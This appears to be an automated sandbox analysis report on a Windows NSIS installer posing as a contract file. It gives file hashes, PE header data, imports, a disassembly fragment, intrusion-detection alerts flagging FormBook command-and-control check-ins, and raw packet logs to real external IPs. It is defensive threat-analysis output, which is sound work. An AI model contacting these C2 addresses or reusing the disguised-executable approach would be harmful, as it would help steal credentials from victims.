                                                                                  SHA1:163C23302E2DA2B2265A7CD7ED08BE16A3853DCA
                                                                                  SHA-256:49C47AAA67085C8B38D02DC0F1F792E83FA17D41CE16927888C9085F530E9DB4
                                                                                  SHA-512:7EE103CCCC54B148E7AD62F37FF4ACFC4438436C6F75D15E5248CB19643348C70F2B63062712817002CE4D173E51A7A0C8B3851FCD0FC0D6E1302838909B1C2D
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):141102
                                                                                  Entropy (8bit):4.617479710733152
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:iVrvbCXCZyD8oXlhfinwSs1OShexKZHGE:iVveeCzfinwSuU0ZmE
                                                                                  MD5:039E70DA01693902106A778C44775442
                                                                                  SHA1:1E1317B39552587567A03AD4D450DBF5B1AEF517
                                                                                  SHA-256:110A6039C806404022CC67992B4732B7916D4D8EFD3AFA16B2A3AF2B60773410
                                                                                  SHA-512:CFB3061902C4CD479364D00029DF8D47BA59EAC27797367E3B606B34DB2552EA465627B9B44D0E95BD4E70B0A2E17F5D728C13EFFA42C2A54F823D9623B5DC91
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):244138
                                                                                  Entropy (8bit):1.252663089946015
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:cv49C5wBVa5O2Fx8p7KLOTSo3NTuAG15VTvfAX+H7v+uQVsfpqSC26Pn6DD/SNsg:JBQxurv96jREO3X2r
                                                                                  MD5:BBD77A921062C9B6CBF4BEDFF50E1514
                                                                                  SHA1:C25712C5F69E016A364E8898B59E7229E3C5E7A4
                                                                                  SHA-256:E2882B3589FF6D9FA79AC2D88FC8DE8FD94BA046E8B9796203A4916C73731EAD
                                                                                  SHA-512:9BDFC20EFFD587EC19B524E36D392F4863C8242C8D4C8C7F81164A0E0DF84C5BF1633400873D0F68C40079113F9F2568706642334FCFDCCE4C6E0B1D7D5FB660
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):438128
                                                                                  Entropy (8bit):1.2562406175237242
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zN/79C7p5KmH/e6grFLDiN8w27kdDZK5M9aR:hyp5K4e6kFLoMV
                                                                                  MD5:E883CEF7CF2793E15A52C9BAC1CDE472
                                                                                  SHA1:1D4973110569354FA072BA3AFF0BD21EA0DF109A
                                                                                  SHA-256:2FF67336CFEEE418E565B0C79855927FC0CD0B1E9F2F40A59F1CB7EF2328635A
                                                                                  SHA-512:372BE015C3FA19C0EEAA981803900CA088B92188187A69697EEE808068F8033225BFD2927E2DB54EABEECAC05A421DC6CCCABFE19F39788B4F6D4E6F80CE04A5
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):15722
                                                                                  Entropy (8bit):1.1774803541140593
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:QlmaSsDp47EcNFpMw8GM4Zq+AUUnPMN61WN1:QbSc47/lv8n4Zq+AUQmy4
                                                                                  MD5:A8FD81B22FDC76D0AAE4ABF40CC1E8F4
                                                                                  SHA1:ECA25609E68636E12C3AB63D7E9F1B7717CE450A
                                                                                  SHA-256:13148F74A847C0F474385F1E62C01A5065700A472BF689D7299D3F420A7CC45D
                                                                                  SHA-512:7E0CE6444E0F402278704066AE74F442684B80959CB90CFABA6A3BBCA1EB754EEBCDE11A61FE17D8DE1F708F035BDC2C7825BF9E8F92D761CE0E78BA68544C6B
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):38361
                                                                                  Entropy (8bit):1.2166387306020765
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:X+F+sq/qAweG+1AI4KbEElQxRqKJOPOXALDW3uYBspm5NfXDZ9:X6M/l17oEnYjP
                                                                                  MD5:2BF0CAC964058C5B0D73930FC7412775
                                                                                  SHA1:003BEC59CB10BDD8B5B760C14DB899637E85AFBE
                                                                                  SHA-256:5A823D12E477927D5133F5B4DE1A5BCB0973FDBBDC4C966C821928CB439FC97A
                                                                                  SHA-512:303CF2DE6CFC652A10E543E0F6484097042234C786624F1B67668CA254B03DE2CCF4D7EB0FB6E13172F605B1B4B742D8694CF3549952523753C5DDE741975564
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):434
                                                                                  Entropy (8bit):4.305884836882498
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:mBX7vwwJDXCuNQLIU/0vkxuYAz8/p7QTrYSCmDEIHlwq+:mBXUWEzR7ylCeEUw
                                                                                  MD5:3F6632F26EBA2C111F54C97312D4C4EA
                                                                                  SHA1:8D3FB7505058C8C5CB22133C77213D6B37CDD5F9
                                                                                  SHA-256:CE8824C6205F36A17C4476BF02839F065009CD15E88970E653CE5F6A89BD9954
                                                                                  SHA-512:EED0879B222E9F074C109B2FA8548F441AD1A4C1CEF8EDB3BAE6D05308E2916061F2A2835E9252A2EDE27608435E40E8C52849B9DD8D38A5FBBEC995628D28E7
                                                                                  Malicious:false
                                                                                  Preview:kumquat equilibrious invector occludes vesteuroperen knippelfines,laparosplenotomy subagents skatkisternes sovehjertet angiospermous abastard caprate efterbyrdens exercised organisationsliniens puberties..ansvarhavendes unhumidified fordjelsesproces forureningsomraades,nondivisive famle illicitly lithophone lattins cubit rougens svmmebrillerne..untestamental transect subfestively subserviently hyldevarer.maaske pastoral overlooks,
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.957826727244492
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:UMOWA_PD.BAT.exe
                                                                                  File size:566'445 bytes
                                                                                  MD5:d1f841d041c915f803dbe6c15b19c510
                                                                                  SHA1:85190628be4d7ed332737df38a580455e29155e1
                                                                                  SHA256:5af56bd9193c8379584ced6a37121e011007666ef1d77518e3e5ea52ec2ca7c5
                                                                                  SHA512:d8a06b312a5f5f6f37e46bee7c360eb32397be08af636699ba5babca7ff61c651fa950093a410eab21ad854012ad765a803735a5c39c1dab39a4aecf6ae107ac
                                                                                  SSDEEP:12288:qX6pZB10nk2cxhmCVvEIM/XHgeewr+Nc20PJbbiEUW34/:qX6pZ+jMh3EIM/LPBqEUW
                                                                                  TLSH:02C4230A79D4C5E7D86A16346FBEF6609BFE7E9005D0939F3F24BE2E3821344590E249
                                                                                  Icon Hash:9193c9a1858b8db5
                                                                                  Entrypoint:0x4034fc
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                  Instruction
                                                                                  sub esp, 000003F8h
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  pop edi
                                                                                  xor ebp, ebp
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+20h], ebp
                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                  mov dword ptr [esp+14h], ebp
                                                                                  call dword ptr [004080A4h]
                                                                                  mov esi, dword ptr [004080A8h]
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push eax
                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007FE9FCB10CCAh
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  mov ax, word ptr [esp+48h]
                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                  sub ax, 00000053h
                                                                                  add ecx, FFFFFFD0h
                                                                                  neg ax
                                                                                  sbb eax, eax
                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                  not eax
                                                                                  and eax, ecx
                                                                                  mov word ptr [esp+00000148h], ax
                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                  jnc 00007FE9FCB10C98h
                                                                                  and word ptr [esp+42h], 0000h
                                                                                  mov eax, dword ptr [esp+40h]
                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                  mov dword ptr [00429AD8h], eax
                                                                                  xor eax, eax
                                                                                  mov ah, byte ptr [esp+38h]
                                                                                  movzx eax, ax
                                                                                  or eax, ecx
                                                                                  xor ecx, ecx
                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                  movzx ecx, cx
                                                                                  shl eax, 10h
                                                                                  or eax, ecx
                                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4c000 | 0x3440 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6556 | 0x6600 | dd25e171f2e0fe45f2800cc9e162537d | False | 0.6652113970588235 | data | 6.456753840355455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fb38 | 0x600 | 2bc02714ee74ba781d92e94eeaccb080 | False | 0.501953125 | data | 4.040639308682379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x22000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4c000 | 0x3440 | 0x3600 | 5950a4e36f0f510396fb34e6e03b573a | False | 0.5579427083333334 | data | 5.567094918094419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4c2f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.7190831556503199
RT_ICON | 0x4d1a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.7035198555956679
RT_ICON | 0x4da48 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 | English | United States | 0.33963414634146344
RT_ICON | 0x4e0b0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.6423410404624278
RT_ICON | 0x4e618 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.39381720430107525
RT_ICON | 0x4e900 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5101351351351351
RT_DIALOG | 0x4ea28 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4eb28 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4ec48 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x4ed10 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4ed70 | 0x5a | data | English | United States | 0.7111111111111111
RT_VERSION | 0x4edd0 | 0x248 | data | English | United States | 0.4811643835616438
RT_MANIFEST | 0x4f018 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                  2024-09-25T09:59:29.490424+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498303.33.130.19080TCP
                                                                                  2024-09-25T09:59:29.490424+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498303.33.130.19080TCP
                                                                                  2024-09-25T09:59:43.242354+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204983484.32.84.3280TCP
                                                                                  2024-09-25T09:59:43.242354+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983484.32.84.3280TCP
                                                                                  2024-09-25T09:59:53.614469+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983554.67.87.11080TCP
                                                                                  2024-09-25T09:59:56.315766+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983654.67.87.11080TCP
                                                                                  2024-09-25T09:59:59.018393+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983754.67.87.11080TCP
                                                                                  2024-09-25T10:00:01.718517+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204983854.67.87.11080TCP
                                                                                  2024-09-25T10:00:01.718517+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983854.67.87.11080TCP
                                                                                  2024-09-25T10:00:07.199447+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049839194.58.112.17480TCP
                                                                                  2024-09-25T10:00:09.962844+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049840194.58.112.17480TCP
                                                                                  2024-09-25T10:00:12.731959+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049841194.58.112.17480TCP
                                                                                  2024-09-25T10:00:15.489816+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049842194.58.112.17480TCP
                                                                                  2024-09-25T10:00:15.489816+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049842194.58.112.17480TCP
                                                                                  2024-09-25T10:00:21.165137+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984338.47.207.14680TCP
                                                                                  2024-09-25T10:00:24.012141+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984438.47.207.14680TCP
                                                                                  2024-09-25T10:00:26.863413+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984538.47.207.14680TCP
                                                                                  2024-09-25T10:00:29.723795+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204984638.47.207.14680TCP
                                                                                  2024-09-25T10:00:29.723795+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204984638.47.207.14680TCP
                                                                                  2024-09-25T10:00:34.953818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498473.33.130.19080TCP
                                                                                  2024-09-25T10:00:37.594539+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498483.33.130.19080TCP
                                                                                  2024-09-25T10:00:40.236032+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498493.33.130.19080TCP
                                                                                  2024-09-25T10:00:42.873084+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498503.33.130.19080TCP
                                                                                  2024-09-25T10:00:42.873084+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498503.33.130.19080TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                  Sep 25, 2024 09:55:03.457815886 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.457928896 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.457988024 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.458161116 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.599057913 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.599160910 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.599225044 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.599283934 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.599489927 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.603563070 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.603806019 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.740366936 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.740401030 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.740581036 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.745310068 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.745640993 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.881901026 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886369944 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886465073 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886528969 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886563063 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.886771917 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.027533054 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027605057 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027653933 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027700901 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027811050 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.027988911 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.030857086 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.165658951 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.236366987 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:14.340679884 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.341029882 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:14.348584890 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:14.452018976 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.453141928 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.453388929 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:15.855030060 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:15.960272074 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:16.872900009 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:16.977361917 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:16.977567911 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:16.985219955 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:17.088793039 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:17.089382887 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:17.089560986 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:18.494982004 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:18.599210978 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.512634039 CEST4976080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:19.616997004 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.617340088 CEST4976080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:19.625036955 CEST4976080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:19.728497028 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728585005 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728643894 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728704929 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728843927 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728985071 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.152630091 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.258761883 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.259068012 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.264098883 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.368486881 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.369791985 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.369885921 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.370206118 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.372066975 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.477318048 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.560062885 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:27.662559986 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.662862062 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:27.670301914 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:27.772866964 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.774024010 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.774353027 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:29.180136919 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:29.283478975 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.199776888 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:30.302237034 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.302587986 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:30.310297012 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:30.412683964 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.415070057 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.415380955 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:31.820128918 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:31.922312021 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:32.837743044 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:32.972023010 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:32.972208023 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:32.979851961 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:32.979970932 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:33.099163055 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099235058 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099307060 CEST80497643.33.130.190192.168.11.20
